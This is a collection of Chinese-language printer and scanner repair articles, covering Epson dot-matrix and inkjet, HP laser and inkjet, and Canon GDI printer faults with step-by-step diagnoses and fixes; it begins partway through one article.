    13.好了！剩下的是小心地一步步倒装回去，希望你还没忘了“来时的路”！别忘了最后一步是把调节杆从＋位打到0位，开机进行一次自动清洗。


EPSON LQ—670K票据打印机故障排除三例

《一键清理系统垃圾》

EPSON LQ—670K票据打印机故障排除三例

    故障现象一：加纸后，缺纸灯仍亮，不打印。
    分析与排除：该打印机的检纸电路有三个传感器，前后两个干簧传感器用于检测有没有打印纸送入。一旦有纸触及传感器的簧片，使传感器的触点动作，打印机便启动进纸程序，自动将纸送到准确的位置，为打印做好准备。在此过程中，打印纸是否到达了相应的位置，则由另一个光电式传感器负责检测。当纸到位时，控制面板上的缺纸灯熄灭。
    从以上的故障现象分析，估计是光电传感器有故障。笔者根据实物画出了光电传感器与主控电路板之间的部分电路，如^08030401a^。从图中分析，发光二极管接于插件CN5的1脚和3脚之间，电阻R6串接于＋5V向发光二极管的供电回路中，起到降压和限流的作用。正常情况下，无纸时，光敏管因接收不到从打印纸反射回来的光线，处于截止状态，4脚输出低电平；有纸时，光敏管导通，4脚输出接近＋5V的高电平。
    在联机状态下，用万用表测量4脚电压，无论有纸或无纸，4脚电压均为低电平；而用灯光照射时，4脚电压变为高电平，说明光敏管是好的。再测1脚电压，为＋5V，不正常（正常时，发光二极管两端的电压降应为＋2V左右）。检查探头与软电缆的连接处，连接情况良好。由此，判断发光管已开路。换上新的光电检测探头，故障排除。
    故障现象二：打印机使用时突然停机，关机后再开机，无任何反应，电源灯也不亮。
    分析与排除：打开打印机机壳，拔出所有连接头，拆下打印机外壳和屏蔽罩，使电路板露出来。检查电源电路，发现保险丝完好，其它部分也未发现有明显的烧毁的痕迹。开机用万用表检测整流输出端，有＋300V电压输出，正常。由于搞不清电源电路中其它部位的电路结构和各输出端的定义，因此一时无法进行下去了。
    凭着多年维修实践中所积累的经验，决定从负载端查起。首先，顺着连接到主控板上的插头进行检查，弄清每个插头的功能。其中CN6、CN7分别为打印头中长针和短针的驱动信号线，CN8为走纸电机驱动信号线，CN9为字车电机驱动信号线，其它插头均为传感器连接头。
    接下来，采用将负载逐个拔除后试机的方法，分别对CN6～CN9四个插头做了试验，打印机电源指示灯均未点亮。考虑到光电传感器中发光二极管也是电源的负载，所以决定再分别拔除连接检纸传感器的CN5和初始位置传感器的CN12进行试验。果然，当拔除CN5后试机，打印机电源灯亮，并且在开机时字车也有相应的自检动作。
    用万用表测量CN5软电缆，发现其2脚和3脚短接，当CN5插入主控板时，就将＋5V直接接地，因而导致电源电路过流保护。做进一步检查时发现，软电缆与探头连接处已经扭曲变形。用剪刀剪去电缆顶端损坏的一节，然后用刀片刮出一段，重新接好后试机，故障排除。
#1　　故障现象三：打印过程中，在换行时多走了一行，打出的一行汉字被分成上下两截。
    分析与排除：对打印机进行自检操作，正常，说明打印机本身控制逻辑及机械传动部分均能正常工作，故障只可能出在主机、打印机接口电路或信号电缆部分。
    按照先易后难的检修原则，首先检查信号电缆的连接情况，发现信号电缆与主机连接处的螺钉未旋紧，接头倾斜。将接头拔出后重新插牢，并用一字型螺丝刀将两头的紧固螺钉旋紧，开机试验，故障排除。


EPSON 喷墨打印机计数器故障

《一键清理系统垃圾》

EPSON 喷墨打印机计数器故障

    我公司使用了许多EPSON公司生产的喷墨打印机。但是，A3幅面的喷墨打印机却相对较少，有EPSON STYLUS COLOR 1500K和EPSON　STYLUS COLOR 1520K这两种。近年来，使用一切正常。最近我用1520K开机打印文稿时，打印机突然发出一阵“恐怖”的声音，随后打印机右边面板上的所有红灯全部发亮，打印头无吸墨动作，机器不能打印任何文字与图像，整台打印机陷于瘫痪。

    起初估计是墨盒中的墨水用尽，但转念一想，两个墨盒（彩色的与黑白的）虽使用了一段时间，但根据以往的经验，理应还可以再使用一段时间。因为墨盒中的墨水如果用尽，只会有一个或两个灯闪烁，不会全部灯都亮且闪烁。查看使用说明书，指示灯全亮且闪烁是发生未知错误，须关机几秒钟后再开机，如果错误仍存在，最好与供应商或授权维修中心联系。按操作手册做，反复开机关机均是如此。而我急着打印文稿，找供应商，不能解燃眉之急，还得自己想办法。

    俗话说：病急乱投医。按一般常识，估计是软件或病毒原因，于是乎，又是装软件，又是用瑞星、KILL、KV300检查杀毒，一段时间忙乎后，问题照样没解决。还会有什么原因呢？一时想不出来，立即上EPSON网站查资料，一无所获；接着，打电话给附近的EPSON特约维修中心、授权维修中心等处咨询。得到了一丁点有用的信息，大概是：EPSON打印机内部设有一个计数器，记录墨头吸墨次数。等计数器计到一定数值后，就要清洗吸墨海绵及装用完墨盒，然后将计数器清零即可。经过反复实验，终于找到了将计数器清零的方法：按住“Alt”键、“换行/换页”键、“进纸/退纸”键、“字体”键四键，开机，听到“嘟”一声响后，机器恢复正常工作。


HP 6L激光打印机常见故障的分析与维修

《一键清理系统垃圾》

HP 6L激光打印机常见故障的分析与维修

    故障现象一：打印时经常卡纸。
    分析与维修：“卡纸”现象是HP 6L激光机最常见的故障。HP 6L激光打印机卡纸一般多属机械故障，大多出在进纸和出纸通道（即定影部位）。其中进纸部位卡纸，多半是因搓纸轮过脏（或机械磨损所致）。故激光打印机使用一段时间后就需定期清洗搓纸轮，通常用一块软湿布擦洗多次即可。
    在排除被卡纸张时要细心，尽量不要撕碎纸张。HP 6L打印机进纸部分有两个微调开关，一个是用于探测有无纸张；另一个用于探测有无进纸。清理完纸片后，要使这两个微调开关复位，否则机器就不能工作。属于机械磨损的要更换搓纸轮，在出纸部分卡纸，多是由于纸张克数不够或纸张质量低劣所至。6L激光打印机一般应使用60克以上的双胶纸或复印用纸。在清理这类卡纸情况时，一是要注意高温，防止被烫伤；二是要注意上下定影部分，严防刮破上定影纸筒和下定影胶轮。卡纸时，一般最好关掉机器，拆开定影部分，再取出卡纸。清理完毕后，也要注意在出纸末端有一探测纸尾的微调开关，应使之复位，动作灵活。
    故障现象二：打印质量差。
    分析与维修：该故障一般多出在墨粉盒和光电部分。墨粉将用完时，打印质量会下降，打印面上会出现一条条白道，最初发现这个问题时，拿出粉盒，均匀摇晃几次，使墨粉分布均匀，还能再打印40～80页。另一方法就是换新的粉盒，换新的粉盒比较简便些，但价格高，一般在300元左右，所以有不少使用者用使用过的粉盒再灌粉，这样灌一次粉一般20元～60元，值得一试。但灌粉既麻烦，又脏。这里介绍一个简便的办法：粉盒上有两个粉仓，一个是装新粉的，一个是装废粉的，从正面打开机器，取出粉盒，位于粉盒上边的是新粉仓，位于粉盒下边的是废粉仓。在新粉仓和废粉仓上各开一个直径约1厘米左右的孔，首先把废粉仓的粉从孔中倒出，用胶带纸把孔堵上，然后把新买来的粉从孔中装入新粉仓，装完后也用胶带纸封好，这样既不用拆粉盖，又不破坏原来的组织结构和密封性能，简便易行，效果好。
    如果不属于粉盒的问题，那就要考虑光电部分。首先应知道一些激光打印机的基本原理。它主要由激光器、准置透镜、多面棱镜、F─Q透镜、电子照相等部分组成。电子照相部分包括了感光鼓、充电电晕、转印电晕、消电灯等主要部件。这些部件要定时维护做清洁，防止污染，凡能看见的墨粉都应清除掉。6L的转印电晕外面包了一层海绵，要保持清洁，脏了以后用软湿布擦拭干净即可。这里最不被人注意的，是激光器到F─Q透镜部分，因为这部分包在一个暗箱之中，不容易看见，脏了往往也不知道。6L的这部分在顶盖上，打开前盖，顶盖上有一方形盒子，里面有一镜面，时间长了，镜面会脏，造成字迹模糊，甚至不输出文字，需及时擦拭干净。
    故障现象三：打印纸上出现竖白条纹。
    分析与维修：根据故障现象，该故障可从以下3个方面予以分析：
    1.安装在感光鼓上方的反射镜上如有灰尘、纸屑等脏物时，激光会被这些镜面上的脏物时所吸收，而不能到达感光鼓上，从而在打印纸上形成白条纹。
    2.次级电晕线装在打印纸通道下方，会吸收灰尘、纸屑等杂物，电晕部件因长期使用或会工作环境差而变脏或被堵塞，从而阻止墨粉从感光鼓转移到打印机上，也会形成上述故障。
    3.墨粉盒失效，通常会造成大面积区域字迹变淡而出现竖白纹。取下墨粉盒轻轻摇动，使盒内墨粉均匀分布，如仍改进不大，则应考虑更换墨粉盒。
    故障现象四：打印纸上重复出现脏迹。
    分析与维修：众所周知，一张纸通过打印机时，机内的12种轧辊转过一圈，最大的感光鼓转过2～3圈，送纸辊可转过10圈。当纸上出现间隔相等的脏迹时，可能是由脏污或损坏的轧辊引起的。假设某一轧辊上沾有污迹，如脏迹相距较近，可能是小孔辊形成的；相距较远时，就应检查大一些的轧辊。测量出脏迹之间的距离，再用下式算出引起脏迹的轧辊直径：
    轧辊直径=脏迹距离÷3.1416
    对于HP 6L系列激光打印机，感光鼓直径为3.75英寸（95mm），显影辊直径为2英寸（51mm），定影辊直径为3英寸（76mm）。查出有问题的轧辊后，便可对号入座，进行清洗或更换了。


HP LaserJet 5000 激光打印机换粉详解

《一键清理系统垃圾》

HP LaserJet 5000 激光打印机换粉详解

    随着科技的进步，电脑在各行业日渐普及，打印机也作为企业办公的必需品得到更加广泛的应用。激光打印机以其优良的打印质量、快速的打印速度以及简便的操作界面为广大用户所喜爱。
    HP LaserJet 5000激光网络打印机以其噪音小、分辨率高（1200dpi）、打印速度快（16页/分钟，首页仅需12.2秒）、打印幅面宽（312×470毫米）、连接/使用方便、扩充性强（最大内存容量100MB）、打印容量大（一个鼓粉盒可打印10000页，系统默认值）、售后服务周到等优点而深受各行业的欢迎。但是，由于其鼓粉盒是一次性耗用品（HP公司回收鼓粉盒，不建议个人加粉），当其碳粉用尽时（机器控制面板提示Toner Low），为了继续打印，一般用户不得不买一只新鼓更换。而因其鼓粉盒价格较贵（约1300元左右），所以应用起来很不经济。通过笔者个人的亲自实践，发现其鼓粉盒是可以加粉的（其专用粉仅200元左右），这可大大地省下一笔耗材的开支。具体步骤如下：
    1.换粉前的准备工作。必备工具有十字头螺丝刀大小各一把，平头螺丝刀一把，不透光软布一块，尖嘴钳子或镊子一把。将鼓粉盒从机内取出，放到一张干净易于操作的桌子上（最好在桌子上铺一张纸，防止废粉漏出）。
    2.取硒鼓罩。首先以硒鼓放入打印机的方向为准，用十字头螺丝刀将硒鼓左边的五颗螺丝拧下（金属托架不可取出，因与内部相联，硒鼓上方的三颗螺丝比其它的螺丝都小，安装时不要同其它的螺丝弄混了），用钳子拔下右边的金属托架，用平头螺丝刀轻轻按下右边硒鼓罩塑料托架的挂钩（注意：其内部有一小弹簧，不要丢失了，并记住其安装方向），取下左边的塑料盖（固定硒鼓用的，由两颗螺丝固定），取下与硒鼓托架相连的塑料罩（注意其内部有塑料齿轮和定位销，不要弄坏了），小心地取下硒鼓罩，不要碰到硒鼓（淡蓝色的辊轴）。
    3.取硒鼓和清洁辊。用十字头螺丝刀拧下右边的最后两颗螺丝，拔出其金属固定销，轻轻取出硒鼓，用不透光软布包好（硒鼓的曝光时间不应超过十分钟），用镊子将清洁辊从固定槽中推出。
    4.取废粉盒。用十字头螺丝刀拧下废粉盒上的两颗螺丝，取下金属盖（因为当向内推入固定废粉盒的两个金属销时，它会顶住固定销），用小十字头螺丝刀将左右两端的固定销推出，取下废粉盒，并将其清洁干净。
    5.加粉。轻轻取下载体（一带有磁性的辊轴，上面会有很多碳粉，不要将其擦掉，它的作用是使打印时碳粉分布均匀），打开粉盒盖，上面有一红一黑两个塑料固定压片，将一瓶碳粉摇动均匀后完全加入即可（一瓶专用碳粉正好加一次）。
    6.安装测试。装回时应按照以上步骤的逆顺序一步步进行，并进一步清洁鼓粉盒，再均匀摇动几下，装入打印机，运行自检程序，创建清洁页，选一篇密度较大的文章打印几页即大功告成。
    以上是我个人在为HP LaserJet 5000网络激光打印机换碳粉的实践经验总结，希望能给各位热衷于动手干的朋友一点帮助。


HP喷墨打印机“卡纸”的处理

《一键清理系统垃圾》

HP喷墨打印机“卡纸”的处理

    我去年买了一台HP Deskjet 695C打印机，使用一年来，工作一直很正常。可最近打印时，总是打到纸的三分之一处时，打印头就不动了，回复指示灯和电源指示灯交替闪烁，Windows则提示“打印头无法移动，打印机卡纸。”按提示，打开打印机顶盖，取出打印纸，并未发现有碎纸。重新打印，故障依旧。我开始怀疑是打印机软件有问题，于是把打印机软件重新安装了一遍，可故障未见排除。当我再次打开打印机顶盖取出打印纸时，发现打印机里用来固定打印头，使打印头来回移动的轴，己失去了以往的光亮，发黑，用手摸一摸，摩擦力很大。这时我才恍然大悟，由于灰尘使润滑油变稠，使轴的摩擦力加大，使打印机的打印头移动困难，故打印机报告卡纸。
    于是，我找来布和润滑油，先用布（注意布一定不能掉毛）把轴擦干净，最好能擦得光亮如初，然后把润滑油抹在上面，但不要抹得太多。经过上面的处理后，打印机就不会出现卡纸现象了。
    最后我想对经常使用喷墨打印机的朋友们提个建议：对打印机中经常活动的部位要定期检查，定期清洗。


LQ-1600K Ⅲ打印机两个故障的解决

《一键清理系统垃圾》

LQ-1600K Ⅲ打印机两个故障的解决

       为改善我单位的办公条件，去年单位的电脑也鸟枪换炮了，还配置了一台EPSON LQ-1600K Ⅲ 打印机，使用一段时间后，感觉较以前的EPSON LQ-1600K好用的多，不久又买了一台同型号的打印机。

谁知不久相继发生了故障，为此，还受到领导的批评。现将解决的方法写出来与大家共享。 不连续打印故障 第一台打印机使用不久，时常出现不连续打印的现象，每次打印三、五行就自动进纸三分之一左右的页面再打印三、五行，有时，还伴随着不进纸现象出现。开始还认为可能是灰尘影响了进纸检测装置，造成打印机不能检测到纸张而引起的，清理灰尘后，仍不见情况改善，只好打电话向服务商寻求解决。经过技术人员检查后，也没有给出一个明确的说法，只是说回去研究研究，一去多日。

正是工作紧张之日，领导可不许我们等啊！只好自己硬着头皮解决：打开机器，反复观察故障机器的运行情况，依旧，无解。机器一直使用的好好的，怎么会突然有了毛病了呢？突然，我发现打印机针压调节杆在2至3之间，不对啊，正常情况下应该在0或1才对。我把调节杆扳到正常位置，一试，一切OK！我一问同事才知道，前几天，打印蜡纸时调整过此杆，用过后没有复位，原来如北(此)啊！后分析造成故障的原因是：当打印介质较厚时我们应该把针压调的小一些即针压调节杆向数字大的方向调整，在此状态下，如果我们使用较薄打印介质，在打印的过程中，由于针压较小，纸张较薄，加上机器打印时的晃动，极造成纸张检测装置检测不到纸，此时，机器自动启动走纸装置，所以，在打印过程中，就出现了打印几行走一段纸的现象。希望大家可不要象我们这样傻噢！ 假断针现象 第二台打印机买来没几天，发现有时每行字符的下面有漏打的现象，时隐时现，开始还认为是新机器，可能色带浸润不均造成的(哪有的事儿)，逐日，发展到有三分之一的字符不能打印上去。打电话问服务商说短针了。嘿，才买了几天，这打印机就断针，这还了得。装箱，驱车找经销商，开箱，试机，平安无事(嘲笑)。回单位，试机，一切正常(纳闷)。不日，那鬼毛病又出现了，真是见鬼了。

这次，我耐着性子仔细观察机器的打印过程，无解。我拿起打印的样张仔细观察，发现漏打的地方有针压的痕迹，就是没有墨色，怪哉！如果打印针断的话，纸上应该没有针压的痕迹，有针压的痕迹，色带又是新的，为什么就打印不上字呢？重试，仔细观察打印头，发现色带的高度不对，停下机器，用手将色带导向夹向下一按，“咔嚓”一声，色带向下移动了，这时我才恍然大悟。

重试，嘿，一切正常。原来，在安装色带时，色带导向夹没有安装到位，且导向夹的定位插孔有点大，固定不牢，在使用和搬动的过程中色带极易上下窜动，以至造成字符的下半部分打不上字的现象。 通过以上两次故障的自己解决，我们明白了一个道理：凡事自力更生。


LQ-1600K打印机断针的维修及保养

《一键清理系统垃圾》

LQ-1600K打印机断针的维修及保养

    LQ－1600K打印机打印速度快，功能也较多，所使用的色带较长(长14m，宽12.7mm)，所以国内有很多用户使用这种打印机，但由于一些用户在使用中方法不当，经常断针。断针处理方法有两种：一是换打印头，但打印头价格较贵，断了几枚针就换打印头，很不合算；二是换打印针，打印针比较便宜，此方法经济可行。换针是一项技术性较强又十分复杂的工作，首先必须了解这种打印头的结构：LQ－1600K打印机的打印头共有24枚打印针，分上下两层排放，其中上层排放12枚长针，下层排放12枚短针。从打印头出针一方来看，打印针是分两行排列，长针和短针在两行里相隔排放(即每行是一长针一短针排列)，如果LQ－1600K针式打印机出现断针，可按如下步骤处理：

    1.当打印机打出的文字缺笔少画时，就应想到可能是断针所致。应先将打印头取下，用脱脂棉棒醮无水酒精小心擦洗打印头出针一方，擦洗干净后，用24针打印机断针免修程序测试一下打印针状态，由此可判断所断的是长针还是短针、断的是哪一位置的打印针，用笔记下。

    2.先磨几枚长针和短针备用，不管是换长针或短针，新针必须经研磨后才能使用，否则即使换上新针，还是会出现断针的现象(因未研磨的新针棱角刮色带，易断针)。磨针方法：将新针沿45角在细砂皮上研磨，研磨时不断转动新针，然后在白卡纸上磨光，除去棱角。

    3.由于打印针所处的打印针柄是用玻璃胶粘在一个四方铁套内，所以要将打印针柄取出才能进行换针。先将三脚夹扣松开取下，两手握住四方铁套，再用两大拇指将打印针柄轻轻推出，把打印头出针一方朝下放入四方铁套内。

    4.取下铜后盖，便可看到上层的12枚长针了。先取下一枚长针，和新的长针(即经研磨的新针，下同)比较一下，看是否短一截，若是，则此枚长针肯定是断针(该断针经处理可作为新的短针使用)，换上新的长针。换针时要谨慎小心，按一个方向依次取出比较，再慢慢插入原位，一枚针都不能插错，不要乱插乱捅，否则针还没换上就断针了。装好后，用手压住12枚长针的针尾，看看出针一方所出的针是否平齐，若不平齐则还有断针；若平齐则表明断针已被换掉，这时可以盖上铜后盖，扣上三脚夹扣，将打印针柄周围涂点玻璃胶重新装入四方铁套内，断针就换好了。

    5.若断的是短针，则需将12枚长针全部取下，拆下内层铜盖，这时便可看到12枚短针。依次将每一枚短针取下与新的短针比较，判断是否断针，若是，则将新的短针小心插入原位，检查比较完后，盖上内层铜盖。每装入一枚针，用手按住针尾，看出针一方所出针的位置是否正确(主要看短针的排列间距是否相等)，若不正确，重新装入。装好后，扣上三脚夹扣，将打印针柄周围涂点玻璃胶装入四方铁套内。

    6.将修好的打印头装回打印机，用断针免修程序测试一下，看有没有断针，若有，则重复相应步骤进行处理。若无断针，维修便结束了。

    7.定期保养打印机。一是检查色带是否需要更换，发现色带有砂眼洞或色带起皱或打印痕迹较深时，应及时更换色带；二是清洗打印头，正确清洗方法：取下色带，把连着电缆的打印头取下，将打印机和电脑联机，同时用手拿住打印头(出针一方朝下)，将打印头前端部分浸在无水酒精中，打印头出针一方污垢很快就会被清洗干净；三是用质量较好的纸打印(如70克双胶纸)，打腊纸时应取下色带打印，打印完应及时清洗打印针上的腊。通过以上三点，可最大程度地延长打印头的寿命，从而降低维修费用。


LQ-1600K系列打印机维修技巧

《一键清理系统垃圾》

LQ-1600K系列打印机维修技巧

    关于介绍LQ－1600K换针的文章比较多（如《电脑报》1998年第14期、42期），换针步骤也比较详细，但是关于打印头的针位排列、安装技巧的讲述却不尽如人意，而这些又是维修打印机成败之关键。错误的安装方式会导致更大范围的断针、卡针、线圈烧毁，甚至整个打印头的报废。下面，就这些问题，结合笔者体会作一说明。

    （1）维修前先要作测试工作，检查断针位置。通常可以通过目视法，可以在光线充足的环境中查看。由于出针面比较小，肉眼很容易看花眼，可以通过UCDOS 6.0/7.0中的断针免修程序patch24.com测试。具体方法是：在UCDOS环境中，键入patch24/t来进行测试。该程序分别将24根针依次出针，共打印24根线，没有线的针即为断针。patch24的出针针号与打印头针位排列的关系见图一。

    （2）打印头的结构比较简单，它由一个散热片包围着打印头的核心部件组成。核心部件又由上层针结构、下层针结构、出针导向辊组成，它们由一个紧固弹簧钢卡固定在一起。维修时，必须将散热片中的核心部件用力推出，由于散热片与核心部件用胶固定在一起，当推出有难度的时候，可以用木垫片衬底，用小锤轻轻打击（注意，千万不可把打印头的后盖打变形了）。

    （3）LQ1600K打印头分两层，每层12根针。其中下层为短针，上层为长针。如图二所示，T1、T2……T12为上层打印针排列位置（白点）；B1、B2……B12为下层打印针排列位置（黑点）。长、短交替排列，更换下层针需要拿掉所有的上层针。

    （4）新打印针使用前必须进行打磨。因为新针往往比长针还长，故先要比照好旧针，剪掉多余部分，注意，不要剪得太多，留出0.5毫米左右为宜。由于剪断的针尖有毛刺（如图三），故必须打磨，打磨时可用细砂纸（最好用细砂磨石、大理石）进行打磨，必须保证打印针垂直打磨，并且要不断比照好针，防止磨得过多。注意，打印针长一点、短一点都不行，剪、磨时务必注意（打印针市场参考价10元/根）。

    （5）上层有12个穿针孔，在安装上层针的时候，需将针紧贴导向槽，由相应的孔穿出即可。穿针时切不可用力过猛，也不求一步穿到位，只需将针插入孔中以后，压紧下层，轻轻前后左右晃动手腕，让打印针随尾部衔铁自由转动，打印针就会自动对位，对位后仅靠自身重量就会自动滑入。注意，穿针时切勿硬压硬戳，那样不仅会穿错位，还可能断针堵塞导针孔。上层针号与针位排列如图四左图所示。

    （6）下层有内外两圈穿针孔，共24个穿针孔（如图五）。其中内圈孔是给上层针用的；外圈孔是给下层针用的。穿下层针时，也需要紧贴导向槽，由相应的外圈孔穿出，穿针方法同（5）。需要注意的是，更换下层针，必须抽掉所有上层针。在穿针时，为了防止穿错孔，最好穿一个孔查看一次出针面。下层针号与针位排列如图四右图所示。

    （7）针全部穿好以后，扣上紧固钢卡，然后再查看出针面，并用磨石尖对针面打磨，保证所有针尖与针面正好在一平面。

    （8）最后，把打印头装入打印机，装入白纸，暂时不上色带，空打20分钟～30分钟，使针头进一步光滑，保证色带不被刮破

    其它注意事项：1由于打印头内部小东东特别多，故在修理时千万注意不要弄丢了。2经修理过的打印头，不论在散热还是在稳定性上都较差，故在断针不多（3根以下）并不太影响打印效果的情况下，可以不必换针。3修理过的打印头在打印文档时，最好以厚纸方式打印（纸厚调整杆拨到4位置或更高），这样可以降低打印速度以保护打印针。4修理过的打印头在打印文档时，如发现有笔划漂移现象，说明针位不对，必须重穿。5在抽取或安装打印头电缆时，要特别小心，要慢慢地竖直于接口均匀抽出或插入，切不可斜抽或斜插，否则嵌于电缆表面的电路片会被撕裂，直接导致短路或接触不良。


USB扫描仪特殊故障的排除

《一键清理系统垃圾》

USB扫描仪特殊故障的排除

由于USB接口的那种扫描仪具有插拔灵活、使用方便的特点，USB扫描仪现已得到许多办公人士的青睐。当然在实际使用过程中，USB扫描仪并非象我们用户想象得那样，只要简单地一插，就能很顺畅地运行；其实它也会出现各种各样稀奇古怪的故障的，本文下面的内容就为大家解析USB扫描仪的两则特殊使用故障。

    故障现象一：笔者在ACERTRAVELMATE260笔记本电脑中，安装了WindowsXP操作系统，由于需要处理图象，就将单位的一台USB扫描仪Acer640U，插入到笔记本的USB端口上，并严格按照扫描仪的安装顺序正确安装好了扫描仪驱动程序。安装结束以后，笔者为了检验安装得是否正确，还对扫描仪进行了测试，测试结果表明一切正常。然而在真实扫描照片时，扫描仪却总是在提醒笔者，要笔者重新检查扫描仪电源线是否连接好，扫描仪的信号电缆是否接好，但笔者在仔细将电源连接线、电缆连接线重新检查一遍后，发现她们都连接正常，不过重新让扫描仪工作时，扫描仪仍然“无动于衷”；后来只好将安装好的扫描仪重新删除，然后再重新安装，最后的结果还是没有反应，这是什么原因呢？

    故障分析一：出现这种故障的可能原因有很多，例如扫描仪本身如果有问题的话，就有可能出现这种故障提示；还有如果扫描仪电缆线出现故障的话，我们用户也能见到这样的提示，不过笔者由于事先测试扫描仪时，扫描仪显示正确，这说明扫描仪电缆线应该不会有故障；另外，如果在安装USB接口的扫描仪时，先进行插入扫描仪后安装驱动程序的话，USB扫描仪肯定也会出现故障提示；最后一种原因可能是出在驱动程序身上，如果扫描仪驱动程序损坏的话，或者扫描仪程序比较陈旧的话，也很有可能让扫描仪工作不正常。

    故障排除一：找到问题的“症结”所在，问题自然也就迎刃而解。为了能检验扫描仪本身是否有故障，我们可以将它拿到另一台电脑上，重新安装，同时要确保两台电脑中安装的都是同一个操作系统，例如在这里我们必须确保另外一台电脑中也安装的是WindowsXP操作系统，只有这样我们才能排除不会因为操作系统不支持USB接口而导致问题发生的可能，如果扫描仪在另外一台电脑中工作正常的话，那么上面出现的故障就与扫描仪本身无关；另外要确保扫描仪安装的顺序是否正确，正确的安装顺序应该是先安装扫描仪驱动程序，当程序要求我们安装扫描仪时，再将扫描仪插入到笔记本的USB端口上；最后我们再来检查一下扫描仪的驱动程序，为了确保驱动程序的正确，笔者也试过将安装好的扫描仪重新删除，然后再重新安装，不过由于笔者在删除扫描仪后重新安装时，扫描仪和笔记本一直是相连的，因此重新安装后自然也没有成功了，此时我们可以通过使用驱动升级的方法，来修复受损的驱动程序。

    升级时首先打开控制面板操作窗口，并在该窗口中双击系统图标，在随后弹出的设备管理器页面上，用鼠标双击一下ImagingDevice，然后笔者发现在这个页面下有一个AcerColorFlatbedScanner640U，这说明目前笔记本已经安装了USB扫描仪，用鼠标单击之，以便让Acer640U扫描仪被选中，然后再用鼠标单击被激活的属性按钮，然后在出现的扫描仪属性对话框中，选中驱动程序标签，并单击“升级驱动程序”按钮，随后系统将出现驱动程序升级提示框，我们只要按照默认设置，让笔记本电脑自动搜索驱动程序，一旦系统提示找到对应的扫描仪驱动程序后，就使用该驱动程序来完成扫描仪驱动程序的升级工作，最后重新启动计算机后，发现扫描仪就能正常使用了。

    故障现象二：一台刚刚新买的USB扫描仪在开始使用时，一切都很正常，但用不了多长时间，就发现扫描仪在工作的过程中，有很大的“咔咔”震动声响发出，伴随着震动响声，扫描仪的扫描灯管经常出现短暂的停顿，最终扫描出来的图像也出现断断续续的痕迹，而且整体效果不是很清晰。在将USB扫描仪的上面盖拆卸下来后，再运行扫描仪时，发现扫描仪工作时又没有了震动声音，一切又工作正常了，不过再次重新安装好上面盖后，USB扫描仪运行又出现了同样的故障，这是什么原因呢？

    故障分析二：拆开扫描仪的上面盖后，仔细观察扫描仪，发现在扫描仪平板玻璃的下面，换句话说，就是在扫描灯管支架与扫描仪机身相接触的地方，出现两条长长的磨擦痕迹，很显然这是灯管支架在运行时因受阻磨擦而产生。移开平面玻璃板后，灯管支架在运行时它两端的滑片会与平面玻璃板下面紧密接触，再加上灯管支架上弹簧的向上挤压作用，滑片与平面玻璃板挤压就更紧密了，这样一旦它们之间的挤压平面出现任何干涩或者破损时，扫描灯管在移动时就会受到很大阻力，从而出现很大的“咔咔”震动声响，长期运行下去我们就能看到平面板玻璃下面的两条磨擦痕迹了，这也是为什么刚开始使用扫描仪后，扫描仪能正常工作的原因；而一旦扫描仪连续运行的时间很长或者扫描仪处于温度较高的工作环境时，扫描灯管在连续运行时产生的许多热量让滑片与灯架粘合的胶渐渐渗出，影响了滑片与平面板玻璃之间接触表面的平滑，从而造成灯架运行时受到很大的阻力；特别是在扫描仪安装好上面盖后，灯管两端的滑片与平面板玻璃之间的接触阻力就更大了，这样就更容易出现故障；而当移走上面盖时，滑片与平面板玻璃间产生松动，从而能确保灯管运行畅通了。

     故障排除二：要解决这样的故障，我们可以先用类似酒精之类的清洁剂将平面玻璃板和两块滑片表面的胶以及干涩的污迹擦干净，要是滑片表面有破损之处或者翻卷，我们可以使用透明胶带甚至强力胶水将破损处修复圆滑，总之一句话，要保证灯管支架两端的滑片与玻璃面板的接触面平滑，只有这样才能确保扫描仪在运行时不会出现“咔咔”震动声响。


WINDOWS GDI打印机的奇怪故障

《一键清理系统垃圾》

WINDOWS GDI打印机的奇怪故障

    故障现象
    故障一：当用一台Canon LBP－660连续打印长文稿时，每当打到第12页，必定出现问题，纸的上半部是全黑色的，下半部则什么都没有，然后自动停止打印，电脑死机，需重新启动电脑，方可继续打印，当然不能超过12页。拿到经销商处维修，试验连打40页，也毫无问题，看来打印机本身是没有问题了。那么问题难道会出在电脑上么？与打印机相配电脑的配置是磐英112A主板，CPU为塞扬300A，内存是32M，硬盘是5.1G昆腾硬盘的兼容机。有趣的是用这台电脑连接HP6L却一点问题也没有。杀毒、重装系统，以及重装驱动程序，也一无所获，看来这台Canon LBP－660打印机只能用来打印小的文件了。
    故障二：另一台Canon LBP－800打印机，与之相配的电脑为ASUS T2P4主板，CPU为K6－2 266（超频到332），内存为64M，硬盘为6.4G，打印文稿时从未发现任何问题。可是，一次在往B5的纸上打印一幅大小为2.6M 的图像文件时却出现了问题，如果把打印机设置为300dpi，则能满幅输出。若把打印机分辨率设置为600dpi时，图像输出只有半幅，纸的下半幅为空白。状态窗口有诸如“数据传输错误"以及“重新打印"的提示。重启电脑进入BIOS设置菜单，发现LPT选项为normal，将其改为ECP，重启系统，仍然不能正常打印，进入“控制面板"，选取“打印机"，进入LBP－800“属性"菜单，更改打印机的“超时设置"的值，也无济于事，而打印小的图像文件，则毫无问题。难道这台打印机只能用来打印文稿和低分辨率的图像文件吗？
    故障的分析与解决
    这两台打印机都属于采用了Windows GDI（图形设备接口）技术的个人打印机，只能在WIN9X 以及NT下使用。由于打印机本身并没有处理器，所有的数据在打印前都由电脑主机来处理，然后以位图形式发送给打印机，因而对电脑主机的依赖程度较高。如佳能LBP－800对电脑主机的要求是，在WIN9X下，CPU为P200 MMX以上，内存要在16M以上。而其它的非Windows打印机，则对电脑的硬件要求较低，在386上也可以正常运行。Windows GDI打印机与非GDI打印机的区别类似MODEM 的“软猫"与“硬猫"的区别。通常Windows打印机本身的内存很小，如LBP－660为128K，而LBP－800为512K（其它的非Windows的激光打印机的内存多在2M以上），打印时需要打印数据不间断地由主机传向打印机，这过程中如果出现任何错误，都会导致打印失败。
    看来这两台打印机的故障可能出在经过处理后打印数据由电脑向打印机传输的过程中，电脑的处理速度、数据的传输速度与打印机的速度不匹配所致。对于第一台电脑出现的情况，经过经过反复尝试，最后将BIOS的打印口设置改为EPP后，保存并重启系统后，故障消失。对于故障二，根据LBP－800状态窗口的提示来判断，显然是打印数据传输过慢所致，考虑为图像的前半部分打印机已经打印完毕，而后半部分不能及时传输过来。那么，为什么打印机已经改为ECP模式，仍不能正确打印呢？启动CANON－LBP800故障诊断程序，也未发现任何错误，没有错误为什么会打印不正常呢？最后在状态窗口内发现，通过“选项"→“端口设置"，进入端口设置窗口，选取“有DMA的ECP端口"选项，然后退出，故障排除。


